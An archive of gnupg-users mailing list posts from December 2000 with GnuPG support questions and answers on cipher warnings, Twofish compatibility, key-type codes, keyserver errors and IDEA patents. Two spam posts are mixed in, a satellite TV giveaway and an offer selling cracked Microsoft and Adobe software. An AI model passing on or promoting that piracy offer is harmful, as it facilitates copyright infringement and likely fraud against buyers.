2000 20:59:58 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: ; from Florian.Weimer@RUS.Uni-Stuttgart.DE on Mon, Dec 18, 2000 at 07:17:07PM +0100 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <20001218172650.I12265@gnupg.de> Message-ID: <20001218205958.M12265@gnupg.de> On Mon, 18 Dec 2000, Florian Weimer wrote: > The concept of standard network byte order, as it is used in the > Internet protocols and provided by htonl() and friends, is patented. ROTFL. Either we have prior art (one of the early RFCs) or the the patent has expired. > What about the Schnoor patent and DSA? And the two Hitachi patents? Okay. Everything today seems to be patented so we better don't write any code anymore but switch our jobs to be patent attorneys :-) The IDEA patent seems to be different, as there are a couple of cases where Ascom actually sued people over using it. So chances in court are not good. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Mon Dec 18 21:18:14 2000 From: trappedvector@crosswinds.net (Martin) Date: Mon, 18 Dec 2000 22:18:14 +0100 Subject: Symmetric encryption In-Reply-To: <20001217160634.6ed05f3f.brian.galbraith@bigfoot.com>; from brian.galbraith@bigfoot.com on Sun, Dec 17, 2000 at 04:06:34PM +0000 References: <20001217160634.6ed05f3f.brian.galbraith@bigfoot.com> Message-ID: <20001218221814.A933@crosswinds.net> --0OAP2g/MAC+5xKAE Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sunday, December 17, 2000 (CS:7.50.352) 16:06:34 [PM] (+0000) Brian Galbraith [brian.galbraith@bigfoot.com] wrote... > It's a while since I used the symmetric encryption facility og GnuPG, and > currently it does not appear to work for me. Just use gpg -c filename and gpg will ask for a passphrase to encrypt that file. If you want to use ascii armor you would use gpg -c -a filename HTH mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - The only "intuitive" interface is the nipple. After that, it's all learned - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --0OAP2g/MAC+5xKAE Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6Pn8WffxhyW5sNDERAm7hAJ9CxYGnrnkWVY/4i+MLmkT4SL7rxgCgsr+/ MSXCQp1AfwvL25yLxbh4TB4= =39lv -----END PGP SIGNATURE----- --0OAP2g/MAC+5xKAE-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Mon Dec 18 20:39:38 2000 From: trappedvector@crosswinds.net (Martin) Date: Mon, 18 Dec 2000 21:39:38 +0100 Subject: Default Cipher Algorithm Message-ID: <20001218213938.A700@crosswinds.net> --wac7ysb48OaltWcw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi list, i just generated a new key pair with gpg 1.0.4 and all settings on default. just played around with signing and encrypting as i got the following message encrypting a message to myself: gpg: using secondary key CA634208 instead of primary key 6E6C3431 gpg: No trust check due to --always-trust option gpg: writing to `-' gpg: ELG-E/RIJNDAEL encrypted for: CA634208 Martin gpg: DSA signature from: 6E6C3431 Martin gpg: this cipher algorithm is depreciated; please use a more standard on= e! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^= ^^ i know that ELG-E/RIJNDAEL is included in 1.0.4. (BTW thats why i generated a new encryption key) But why does gpg complain about RIJNDAEL not beeing a standard algorithm? confused mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - Linux - its only limit is its physical environment - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --wac7ysb48OaltWcw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6PnYKffxhyW5sNDERAnhaAKCwfbLeyKrAFJxYDV3dT2otXoIvgQCgjGp9 q1Wn3YEqjqYhq5XfjpiYwv8= =sMp9 -----END PGP SIGNATURE----- --wac7ysb48OaltWcw-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From johanw@vulcan.xs4all.nl Mon Dec 18 22:27:27 2000 From: johanw@vulcan.xs4all.nl (Johan Wevers) Date: Mon, 18 Dec 2000 23:27:27 +0100 (MET) Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218205958.M12265@gnupg.de> from Werner Koch at "Dec 18, 2000 08:59:58 pm" Message-ID: <200012182227.XAA09338@vulcan.xs4all.nl> Werner Koch wrote: > The IDEA patent seems to be different, as there are a couple of > cases where Ascom actually sued people over using it. So chances in > court are not good. I can't tell from the information you give. Did Ascom win those cases? And in which countries did they sue, since not all countries accept software patents? -- ir. J.C.A. Wevers // Physics and science fiction site: johanw@vulcan.xs4all.nl // http://www.xs4all.nl/~johanw/index.html PGP/GPG public keys at http://www.xs4all.nl/~johanw/pgpkeys.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From john@unixen.org Tue Dec 19 05:37:09 2000 From: john@unixen.org (John Bacalle) Date: Tue, 19 Dec 2000 00:37:09 -0500 Subject: Decrypt Output is Blank Message-ID: <20001219003709.A2489@unixen.org> RE: GnuPG v1.0.3 (MingW32) encrypted text to GnuPG v1.0.1 (GNU/Linux) I'm either dense tonight or getting some GnuPG stuff from someone else that's new to me. I received an encrypted email from a Win-GPG user. I try to decipher it, gpg -d zulu.asc I'm asked for my pass phrase, I enter it uneventfully, GPG doesn't complain, a few seconds pass, and the prompt returns but no decrypt output. ? I try adding '--output file' but file is blank. I don't know what's up? so I do: gpg -d -vv zulu.asc And I see among the contents, > $ gpg -d -vv zulu.asc > gpg: armor: BEGIN PGP MESSAGE > gpg: armor header: Version: GnuPG v1.0.3 (MingW32) > gpg: armor header: Comment: For info see http://www.gnupg.org > :pubkey enc packet: version 3, algo 16, keyid 1B1CAFC9EC8C49F7 > data: [2047 bits] > data: [2048 bits] > gpg: public key is EC8C49F7 > gpg: loaded digest 2 > > You need a passphrase to unlock the secret key for > user: "John Bacalle " > 2048-bit ELG-E key, ID EC8C49F7, created 2000-07-17 (main key ID E745678E) > > gpg: loaded digest 3 > gpg: key 8AA5C235: accepted as trusted key. > gpg: key E745678E: accepted as trusted key. > gpg: key BA54A558: accepted as trusted key. > gpg: key 4E00CCBB: accepted as trusted key. > gpg: public key encrypted data: good DEK > :unknown packet: type 18, length 163 ^^^^^^^^^^^^^^ Does this mean anything useful? > dump: [...] So, what I have is an 'apparently' good decrypt that doesn't show me the cleartext. Not nice. John -- John Bacalle f./vm. +1 212 894 3778 x1057 N I'm selling several new MCSE and Red Hat books at a discount. My reef Y aquarium and equipment as well: C -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 19 07:51:45 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 19 Dec 2000 08:51:45 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <200012182227.XAA09338@vulcan.xs4all.nl>; from johanw@vulcan.xs4all.nl on Mon, Dec 18, 2000 at 11:27:27PM +0100 References: <20001218205958.M12265@gnupg.de> <200012182227.XAA09338@vulcan.xs4all.nl> Message-ID: <20001219085145.O12265@gnupg.de> On Mon, 18 Dec 2000, Johan Wevers wrote: > I can't tell from the information you give. Did Ascom win those cases? And Soory, I don't know anymore. A long time has passed since I looked into this issue. I know that Ascom has been asked to give a royality free license for IDEA when used in a free (GPLed) software - they refused to do so. I know, we should ask Ascom again to give such a license for free software. I have currently no time to organize such a petition - Great, if you can do so. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Tue Dec 19 09:06:28 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Tue, 19 Dec 2000 10:06:28 +0100 (CET) Subject: Default Cipher Algorithm In-Reply-To: <20001218213938.A700@crosswinds.net> References: <20001218213938.A700@crosswinds.net> Message-ID: <14911.9492.981126.795048@barber.fmi.uni-passau.de> >>>"M" == Martin writes: M> i know that ELG-E/RIJNDAEL is included in 1.0.4. (BTW thats why i generated M> a new encryption key) But why does gpg complain about RIJNDAEL not beeing M> a standard algorithm? Ignore the message. It's a bug. I'll put it in the FAQ now. (Hmm, the FAQ seems to become an important addendum to the BUGS list at http://www.gnupg.org/buglist.html which is seriously out of date. That's not what's it ought to be ...) Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Peter Biechele Tue Dec 19 10:26:23 2000 From: Peter Biechele (Peter Biechele) Date: Tue, 19 Dec 2000 10:26:23 GMT Subject: Problem encrypting with new key !! Message-ID: <20001219.10262300@morpheus.bextec.de> Hello ! I have created two secret keys using 1024 ElG/DSA as suggested by using GnuPG1.0.4-1. Now I want to encrypt a file using one of the secret keys. To that end I type: gpg -r NameOfKey1 --encrypt filename This works fine. Then I try gpg -r NameOfKey2 --encrypt filename This always gives the message: ---- gpg: Diese Verschlüsselungsmethode taugt nicht mehr viel; verwenden Sie eine stärker stan-dardisierte Methode! (translation: This Encryption Method ist not of great use any more ! Use a stronger standardized Method ! What does This mean ???????? Thank you very much for any help ! Peter Biechele -- Dr. Peter Biechele Tel: +49 7641 920869 41 beXtec GmbH Fax: +49 7641 920869 49 Kaiserstuhlstr. 3, D-79312 Emmendingen E-Mail: Peter.Biechele@bextec.de HTTP : www.bextec.de -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From GaryP@e-c-s-uk.com Tue Dec 19 11:06:43 2000 From: GaryP@e-c-s-uk.com (GaryP) Date: Tue, 19 Dec 2000 11:06:43 -0000 Subject: Key usage / Number of keys Message-ID: <01A12A970375D411BA6900C0F05D178E022A3C@MAINSERVER> Hi, I've generated a key pair at home which i use to enc and sign messages. I keep my trustdb, and seckey ring on write protected floppy disk, to prevent any other user modifying the contents. Mainly on floppy to reduce the time its actually available for copying on the computer. I know there are ways around this, but it makes it a little harder for people to get access to my secring. The question is, i want to sign / enc emails sent from work, should i generate a new key pair for use just at work, allowing a seperate ID that would contain my works email as opposed to my home email. Or should i simply use the home key that i have on floppy disk? Problem with the first is now having two keys / trust dbs etc to maintain, but this does mean i can use a different passphrase, meaning if the passphrase was captured it would only comprimise my work and not home keys. (and vice-versa). This is even more true, by the fact that the works computer will be shared with other users, I have a lot more control over how and who uses my home computer (aside from really paranoid ideas of people breaking in to my home computer, which i'm not worried about, my information isn't that important ;-) Problem with the second is the user id will be my home email address and not my works email, which some people may find strange. Does anyone else do something similar to this? Do you have two keys? or have you found another way around this? Cheers, -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Tue Dec 19 12:17:41 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Tue, 19 Dec 2000 12:17:41 GMT Subject: Key usage / Number of keys In-Reply-To: <01A12A970375D411BA6900C0F05D178E022A3C@MAINSERVER> References: <01A12A970375D411BA6900C0F05D178E022A3C@MAINSERVER> Message-ID: <20001219121102.A660.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, GaryP, On 19 December 2000, I received the following message from you regarding "Key usage / Number of keys" G> Hi, G> G> I've generated a key pair at home which i use to enc and sign G> messages. I keep my trustdb, and seckey ring on write protected floppy G> disk, to prevent any other user modifying the contents. Mainly on floppy G> to reduce the time its actually available for copying on the computer. I G> know there are ways around this, but it makes it a little harder for G> people to get access to my secring. G> G> The question is, i want to sign / enc emails sent from work, should i G> generate a new key pair for use just at work, allowing a seperate ID G> that would contain my works email as opposed to my home email. Or should G> i simply use the home key that i have on floppy disk? G> G> Problem with the first is now having two keys / trust dbs etc to G> maintain, but this does mean i can use a different passphrase, meaning G> if the passphrase was captured it would only comprimise my work and not G> home keys. (and vice-versa). This is even more true, by the fact that G> the works computer will be shared with other users, I have a lot more G> control over how and who uses my home computer (aside from really G> paranoid ideas of people breaking in to my home computer, which i'm not G> worried about, my information isn't that important ;-) G> G> Problem with the second is the user id will be my home email address G> and not my works email, which some people may find strange. G> G> Does anyone else do something similar to this? Do you have two keys? G> or have you found another way around this? G> G> Cheers, As a general rule, under both GnuPG and PGP, I generate a key pair for *each e-mail address* I shall use to send signed/encrypted mail. If you are really trying to make your mail as secure as possible, each key pair will have a different passphrase, but for a small number of addresses a common passphrase would do (although if the passphrase is known by others they will then know all your passphrases...so its often a trade off between security and what you can remember). You can keep all your keys on a floppy which is then used from machine to machine (I've never actually done this with GnuPG, only with PGP under Windows). Hope this helps.. Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 19 December 2000 12:11:02 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4b-winpt (MingW32) Comment: For info see http://www.gnupg.org iD8DBQE6P1HatwKLKus4nE4RAgVXAKCAomy9BCHieT8B9ms7Z/MjSk5exwCggWIW Er8Wdt2OW9I4b+85kosMWdc= =0l9P -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Tue Dec 19 12:33:05 2000 From: wk@gnupg.org (Werner Koch) Date: Tue, 19 Dec 2000 13:33:05 +0100 Subject: Problem encrypting with new key !! In-Reply-To: <20001219.10262300@morpheus.bextec.de>; from Peter.Biechele@bextec.de on Tue, Dec 19, 2000 at 10:26:23AM +0000 References: <20001219.10262300@morpheus.bextec.de> Message-ID: <20001219133305.V12265@gnupg.de> On Tue, 19 Dec 2000, Peter Biechele wrote: > This always gives the message: > ---- > gpg: Diese Verschlüsselungsmethode taugt nicht mehr viel; verwenden Sie > eine stärker stan-dardisierte Methode! > (translation: This Encryption Method ist not of great use any more ! Use > a stronger standardized Method ! Don't care about this. Walter: Can you please change the wording of your translation to something like: "Es wird nicht geraten, diese Verschlusselungsmethode zu benuzten". Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fedew@rosario.gov.ar Tue Dec 19 14:26:11 2000 From: fedew@rosario.gov.ar (fedew@rosario.gov.ar) Date: Tue, 19 Dec 2000 11:26:11 -0300 Subject: GPG with LDAP Message-ID: <032569BA.004F0B3E.00@ln01.rosario.gov.ar> Hello. I'm trying to connect GPG with my own server key. To do this I think to use OpenLdap but I can't search any information to help me to connect them. The ldap server (slapd) was listen on port 389 (the default) as stand-alone (not from inetd). The command gpg --keyserver [my server] : 389 --send-keys [a key] respond gpg: [fd 4]: read error: Conection reset by peer. gpg: error sending to `[my server]:389': eof Can you help me? Where can I get more information? Thanks very much. Federico Wiecko -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dave@china.com Sat Dec 16 00:12:07 2000 From: dave@china.com (dave@china.com) Date: Fri, 15 Dec 2000 16:12:07 -0800 Subject: Don't miss this $700 Give Away 752 Message-ID: <000068d5039d$00002fe9$000002f0@middletown.total.net> The answer is.... Free Satellite TV System, Free Installation and Free Vacation! Imagine surfing thru 500 channels of News, Weather, Sports, Learning, Family, Movies, and Pay Per View Channels. AMERICA'S TOP 100 Programming package Includes for just $34.99: Sports - ESPN, ESPN2, ESPN Classic, ESPN News, Empire, Outdoor Life Network, Sunshine, Madison Square Garden, Speed Vision, Home Team Sports, TV Games Fox Sports Channels - Arizona, Bay Area, Chicago, Cincinnati, Detroit, Midwest, Florida, New England, New York, Ohio, Pittsburgh, Rocky Mountain, North West, West, South, South West, Midwest Sports, Altenative1, Altenative3 News - CNN, CNN Headline News, All-News Network, Bloomberg, NASA, C-Span, C-Span 2, Fox News, MSNBC, CNN FN, CNN International, Court TV Family/Kids - The Cartoon Network, The Disney Channel, The Disney Toon Channel, Nickelodeon, Noggin, Pax, PBS You, Angel One, TV Land, Good Samaritan Network, The Fox Family Channel, Trinity Broadcast Network, External Word Television Network Learning - Discovery Channel, Discovery Health Channel, The Learning Channel, History Channel, Food Network, Travel, E!, Animal Planet, America's Voice, HGTV, Free Speech, Link Media, Tech TV, DELLL, Research Variety - A&E, BET, ZDTV, Home Shopping, WGN, QVC, TNN, Weather Channel, TNT, USA, Bravo, Comedy Central, Game Show, FX, Sci-Fi Channel, TV Land, AMC, TCM, LMN, Lifetime, Romance Classics/Independant Film Channel, BBC, ValueVision Foreign - Univision, Galavision, HITN Music - MTV, VH1, MTV 2, Country Music Television AND Over 30 Music Channels! Supplies are going FAST!!! So place your order NOW! A FREE 3 Day 2 Night Vacation for 2 for the first 1,000 NEW subscribers! Choose from 20 destinations: Las Vegas, NV -- Laughlin, NV -- Reno, NV -- Lake Tahoe, NV -- Atlantic City, NJ Honolulu, HI -- Daytona Beach, FL -- Orlando, FL -- Myrtle Beach, SC Anaheim, CA - (Disneyland Area) -- Palm Springs, CA -- New Orleans, LA Gatlinburg, TN -- San Antonio, TX -- White Mountain, NH -- Pocono Mountains, PA Branson, MO -- Puerto Vallarta, MX -- Cancun, MX -- Mazatlan, MX Don't hesitate or you may miss out on this incredible OFFER! -------------------------------------------------------------------------------- To receive your FREE Satellite System & FREE 3 Day 2 Night Vacation for 2! Call 1-877-397-6731 and Mention Code: 122 Live Operators are standing by to take your order 24/7! -------------------------------------------------------------------------------- To UNSUBSCRIBE, Click Here Subject: Don't miss this $700 Give Away!! Looking for that special gift for the person who has everything? -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From john@unixen.org Tue Dec 19 17:30:19 2000 From: john@unixen.org (John Bacalle) Date: Tue, 19 Dec 2000 12:30:19 -0500 Subject: Decrypt Output is Blank In-Reply-To: <20001219003709.A2489@unixen.org> References: <20001219003709.A2489@unixen.org> Message-ID: <20001219123019.B1959@unixen.org> On Tue, Dec 19, 2000 at 12:37:09AM -0500, John Bacalle wrote: -snip Can't decrypt or see output- No one can give me some feedback on this problem?? John -- John Bacalle -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From c.hertel@usa.net Tue Dec 19 17:53:39 2000 From: c.hertel@usa.net (Christoph Hertel) Date: Tue, 19 Dec 2000 18:53:39 +0100 Subject: Decrypt Output is Blank In-Reply-To: <20001219003709.A2489@unixen.org>; from john@unixen.org on Tue, Dec 19, 2000 at 12:37:09AM -0500 References: <20001219003709.A2489@unixen.org> Message-ID: <20001219185339.B394@imp.yoghurt.net> * John Bacalle [2000-12-19]: > RE: GnuPG v1.0.3 (MingW32) encrypted text to GnuPG v1.0.1 (GNU/Linux) the NEWS file: "Twofish and MDC enhanced encryption is now used. PGP 7 supports this. Older versions of GnuPG don't support it, so they should be upgraded to at least 1.0.2" this was mentioned a few times bewfore on the list -> search the archive; as far as I recall either you upgrade all GnuPGs or you don't use the Twofish algorithm (per gnupg options) HTH, Christoph -- PGP (GnuPG) encrypted mail welcome! (Key 0xBAC8E4D5) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 20 09:54:23 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 20 Dec 2000 10:54:23 +0100 Subject: AS/ 400 version? Message-ID: <000901c06a6a$d4a0f5d0$2bf8ae8b@bert> Hi there! Since I've been asked by a customer and didn't know an answer, I'll try to ask the community: Is there an AS/ 400 version of GnuPG or did anyone ever try to compile/ release a version for this platform? Thanks, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From tbeidler@mindspring.com Wed Dec 20 21:35:15 2000 From: tbeidler@mindspring.com (Tom Beidler) Date: Wed, 20 Dec 2000 13:35:15 -0800 Subject: "gpg - invalid armor header" warning Message-ID: I'm working with an ISP and trying to help him trouble shoot some issues. He's running GNUPG 1.04 and he's trying to import a PGP 6. something public key. He's telling me he's getting a "gpg - invalid armor header" error. I was able to add the key successfully to my PGP key ring. Can you import PGP keys? I didn't see anything in the FAQ or the "How to." Any help would be greatly appreciated. Thanks, Tom >>.>>.>>>.>>>>>.>>>>>>>>> Tom Beidler Orbit Tech Services 805.455.7119 (cell) 805.682.8972 (phone) 805.682.5833 (fax) tbeidler@mindspring.com >>.>>.>>>.>>>>>.>>>>>>>>> -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Wed Dec 20 22:57:59 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Wed, 20 Dec 2000 23:57:59 +0100 Subject: --with-colons, key type construction Message-ID: <000901c06ad8$4c6bb060$2bf8ae8b@bert> Hello! I took a deeper look into the output of the --with-colons command. For key type, My public key says, it is '17' and the sub key says it is '16'. Does 16 equal DSA Full (not only Encryption) and 17 El Gamal Encryption Only? If yes, what codes do El Gamal Full (En/ Decryption) RSA Full RSA Encryption only have? Thanks in advance, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Wed Dec 20 23:05:10 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Wed, 20 Dec 2000 23:05:10 +0000 Subject: --with-colons, key type construction In-Reply-To: <000901c06ad8$4c6bb060$2bf8ae8b@bert>; from stephan.stapel@tu-clausthal.de on Wed, Dec 20, 2000 at 11:57:59PM +0100 References: <000901c06ad8$4c6bb060$2bf8ae8b@bert> Message-ID: <20001220230509.A10957@mcdonald.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 20, 2000 at 11:57:59PM +0100, Stephan Stapel wrote: > > I took a deeper look into the output of the --with-colons command. > For key type, My public key says, it is '17' and the sub key says it is > '16'. > > Does 16 equal DSA Full (not only Encryption) and 17 El Gamal Encryption > Only? > If yes, what codes do > El Gamal Full (En/ Decryption) > RSA Full > RSA Encryption only > have? DSA can only do signatures, you can't do encryption with it. Extract from RFC2440: 9.1. Public Key Algorithms ID Algorithm -- --------- 1 - RSA (Encrypt or Sign) 2 - RSA Encrypt-Only 3 - RSA Sign-Only 16 - Elgamal (Encrypt-Only), see [ELGAMAL] 17 - DSA (Digital Signature Standard) 18 - Reserved for Elliptic Curve 19 - Reserved for ECDSA 20 - Elgamal (Encrypt or Sign) 21 - Reserved for Diffie-Hellman (X9.42, as defined for IETF-S/MIME) 100 to 110 - Private/Experimental algorithm. Andrew - -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6QTsZ/LupyPLe7TYRAiYZAJ927uxJURwY5ge4FLSW/4Y3PK6OHACfR3C5 WcyuNp1hVlbIp6n+qqwOsBs= =KEKP -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From npolys@virtuworlds.com Wed Dec 20 17:59:39 2000 From: npolys@virtuworlds.com (Nicholas F. Polys) Date: Wed, 20 Dec 2000 17:59:39 -0000 Subject: problem in keyring setup Message-ID: <01c06aae$9efe65e0$a66cdbd0@jahbepraised> hello all, I am having a difficult time trying to find info on this project. where are the maillist archives please? when trying to import and delete keys to the gpg keyring, I get this repeated message: "gpg: waiting for lock (hold by 27748 - probably dead) "... ? I am not able to clear my keyring and import a PGP public one onto it... ALSO: what is the the unique userID? the key number, the text comment, the email address? pub 1024D/22222222 2000-12-18 Biz keefer (site_trans) ack! _nick -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Wed Dec 20 23:17:02 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Wed, 20 Dec 2000 23:17:02 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001217162932.A639@mcdonald.org.uk>; from andrew@mcdonald.org.uk on Sun, Dec 17, 2000 at 04:29:32PM +0000 References: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> <20001214191017.B688@mcdonald.org.uk> <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk> <20001217162932.A639@mcdonald.org.uk> Message-ID: <20001220231702.A10980@mcdonald.org.uk> On Sun, Dec 17, 2000 at 04:29:32PM +0000, Andrew McDonald wrote: > AFAIK, with the Outlook plug-in you would need to separately > encrypt/sign any attachments first (I'll double check that tomorrow). An update on this. It appears that the plug-in does sign/encrypt attachments. However, attachments are signed/encrypted separately from the body of the e-mail. This separate signing has a clear semantic difference to the PGP/MIME situation where they are signed together as a whole. As an example, consider a situation where I send a contract attached to an e-mail. The body of the e-mail says 'This is a draft. We aren't happy with it yet, and won't sign it until we've made some further alterations.' PGP/MIME signs the combined body and attachment. The PGP plug-in to Outlook signs them separately. The recipient can take the contract and show it to others with my signature on it, without showing them my qualifying statement from the body of the e-mail. Andrew -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From heesun9@mail.com Wed Dec 20 18:30:33 2000 From: heesun9@mail.com (heesun9@mail.com) Date: Wed, 20 Dec 2000 18:30:33 Subject: OS Software? Message-ID: <200012210604.eBL64uJ19170@mail.hsp.de> Are you interested in Office 2000? I am selling perfectly working copies of Microsoft Office 2000 SR-1 Premium Edition for a flat price of $50 USD. The suite contains 4 discs and includes: Word Excel Outlook PowerPoint Access FrontPage Publisher Small Business Tools PhotoDraw Office Developer 2000 is available as well for $65 and is the Premium version with Developer Tools. As well, why not try out some of the greatest operating systems below? Microsoft Windows 98 SE $20 Microsoft Windows Millenium $20 Microsoft Windows 2000 Pro $20 Microsoft Windows 2000 Server $50 Microsoft Windows 2000 Advanced Server (25CAL) $65 If you would like to order, please email me. I accept checks, money orders, and PayPal(Allows use of credit cards with 3% surcharge.) The software are virus checked and copied correctly with the best software and hardware available. In other words, they work flawlessly. CDR's as you know cost very little and there is little reason for me to rip you off. The highest cost is the time and effort I spent in defeating the copy protection system properly. I will definitely send the software upon receipt of payment. Mand Some of our other titles that are available include: Adobe Acrobat 4.0 $20 Adobe AfterEffects 4.1 $29 Adobe Dimensions 3.0 $29 Adobe FrameMaker 5.5 $29 Adobe Illustrator 9 $29 Adobe Image Styler 1 $29 Adobe InDesign 1.5 $20 Adobe PageMaker 6.5 $29 Adobe Pagemill 3 $29 Adobe Photoshop 6 $35 Adobe Premiere 5.1 $29 Adobe Photodeluxe 3.0 $20 Adobe Pro Jpeg 3.0 $20 Adobe Streamline 4.0 $20 MS Exchange 2000 Server $35 MS Map Point 2000 $20 MS Money 2000 *Deluxe $25 MS Office 2000 Proffessional $35 (Word, Excel, Outlook, Access, Power Point & Front Page) MS Office 2000 Premium $50 (Everything Proffessional has plus Photodraw, Publisher, and Business tools) MS Office 2000 Prem. Developer $65 (Everything Premium has plus Powerful Tools for software developers) MS Project 2000 $30 MS SQL Server 7.0 $50 MS WIndows 95 $15 MS Windows 98 SE $20 MS Windows 2000 Pro $20 MS Windows 2000 Advanced Server $65 MS Windows Millenium (WinME) $20 MS Visio 2000 Server $50 MS Visual Basic 6 Professional $30 MS Visual Studio Enterprise 6.0 $55 (Visual Basic, Foxpro, C++, InterDev, J++) *Other titles available: Corel Draw 10 $30 Macromedia Flash 5 $30 Macromedia Fireworks 4 $30 Macromedia Dreamweaver 4 $30 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Thu Dec 21 09:15:17 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Thu, 21 Dec 2000 10:15:17 +0100 Subject: problem in keyring setup In-Reply-To: <01c06aae$9efe65e0$a66cdbd0@jahbepraised> References: <01c06aae$9efe65e0$a66cdbd0@jahbepraised> Message-ID: <00122110151701.30241@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday, 20. December 2000 18:59, Nicholas F. Polys wrote: > hello all, > > I am having a difficult time trying to find info on this project. > where are the maillist archives please? They can be found at http://lists.gnupg.org. > when trying to import and delete keys to the gpg keyring, > > I get this repeated message: > > "gpg: waiting for lock (hold by 27748 - probably dead) "... > > ? The answer can be found in the archives. Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6QcolqUQWN/hplRsRApj/AJ4sBFXhL/N7g71gfJ1N70hDKPDcIwCdFTpq MWdbOnhQLWti1HpSrcW47SY= =y9KE -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From 